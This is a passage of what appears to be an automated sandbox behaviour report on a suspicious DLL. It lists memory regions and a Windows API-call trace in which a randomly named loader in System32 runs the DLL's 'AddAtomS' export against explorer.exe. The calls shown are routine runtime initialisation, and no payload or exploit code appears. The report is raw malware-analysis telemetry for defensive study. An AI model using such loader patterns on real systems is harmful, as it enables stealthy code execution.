"c:\\windows\\system32\\locale.nls") Region: id = 2228 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 2229 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2230 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2231 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2232 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2233 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2234 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2235 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2236 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2237 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2238 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2239 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2240 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2241 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2242 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 2243 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2244 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2245 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2246 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2247 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 2248 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 2249 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2250 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2251 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2252 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2253 start_va = 0x1d0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2254 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2255 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2256 start_va = 0x630000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Thread: id = 106 os_tid = 0xcd8 [0034.833] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f5ac | out: lpSystemTimeAsFileTime=0x14f5ac*(dwLowDateTime=0xe2718570, dwHighDateTime=0x1d3dfba)) [0034.833] GetCurrentProcessId () returned 0xcd4 [0034.833] GetCurrentThreadId () returned 0xcd8 [0034.833] GetTickCount () returned 0x17d59 [0034.833] QueryPerformanceCounter (in: lpPerformanceCount=0x14f5a4 | out: lpPerformanceCount=0x14f5a4*=372236759) returned 1 [0034.834] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.834] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0034.834] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0034.834] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0034.834] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0034.834] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.834] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.835] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.835] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.835] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.835] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.835] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.835] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.835] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.835] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.835] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.835] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.835] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.835] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.836] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.836] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.836] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.836] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.836] GetCurrentThreadId () returned 0xcd8 [0034.836] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"explorer.exe\"" [0034.836] GetEnvironmentStringsW () returned 0x2978f0* [0034.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0034.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x1f09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0034.837] FreeEnvironmentStringsW (penv=0x2978f0) returned 1 [0034.837] GetStartupInfoA (in: lpStartupInfo=0x14f4fc | out: lpStartupInfo=0x14f4fc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0034.837] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.837] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.837] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.837] SetHandleCount (uNumber=0x20) returned 0x20 [0034.837] GetLastError () returned 0x0 [0034.837] SetLastError (dwErrCode=0x0) [0034.837] GetLastError () returned 0x0 [0034.837] SetLastError (dwErrCode=0x0) [0034.837] GetLastError () returned 0x0 [0034.837] SetLastError (dwErrCode=0x0) [0034.837] GetACP () returned 0x4e4 [0034.837] GetLastError () returned 0x0 [0034.837] SetLastError (dwErrCode=0x0) [0034.837] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.837] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f4dc | out: lpCPInfo=0x14f4dc) returned 1 [0034.837] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14efa8 | out: lpCPInfo=0x14efa8) returned 1 [0034.837] GetLastError () returned 0x0 [0034.837] SetLastError (dwErrCode=0x0) [0034.837] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x14ef38 | out: lpCharType=0x14ef38) returned 1 [0034.837] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3bc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.837] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3bc, cbMultiByte=256, lpWideCharStr=0x14ed28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0034.837] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x14efbc | out: lpCharType=0x14efbc) returned 1 [0034.837] GetLastError () returned 0x0 [0034.838] SetLastError (dwErrCode=0x0) [0034.838] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0034.838] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3bc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.838] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3bc, cbMultiByte=256, lpWideCharStr=0x14ecf8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.838] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.838] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x14eae8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.838] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x14f2bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x08j\x8dôôô\x14", lpUsedDefaultChar=0x0) returned 256 [0034.838] GetLastError () returned 0x0 [0034.838] SetLastError (dwErrCode=0x0) [0034.838] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3bc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.838] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3bc, cbMultiByte=256, lpWideCharStr=0x14ed18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.838] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.838] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x14eb08, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0034.838] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x14f1bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x08j\x8dôôô\x14", lpUsedDefaultChar=0x0) returned 256 [0034.838] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.838] GetLastError () returned 0x0 [0034.838] SetLastError (dwErrCode=0x0) [0034.838] GetLastError () returned 0x0 [0034.838] SetLastError (dwErrCode=0x0) [0034.838] GetLastError () returned 0x0 [0034.838] SetLastError (dwErrCode=0x0) [0034.838] GetLastError () returned 0x0 [0034.838] SetLastError (dwErrCode=0x0) [0034.838] GetLastError () returned 0x0 [0034.838] SetLastError (dwErrCode=0x0) [0034.838] GetLastError () returned 0x0 [0034.838] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) [0034.839] GetLastError () returned 0x0 [0034.839] SetLastError (dwErrCode=0x0) 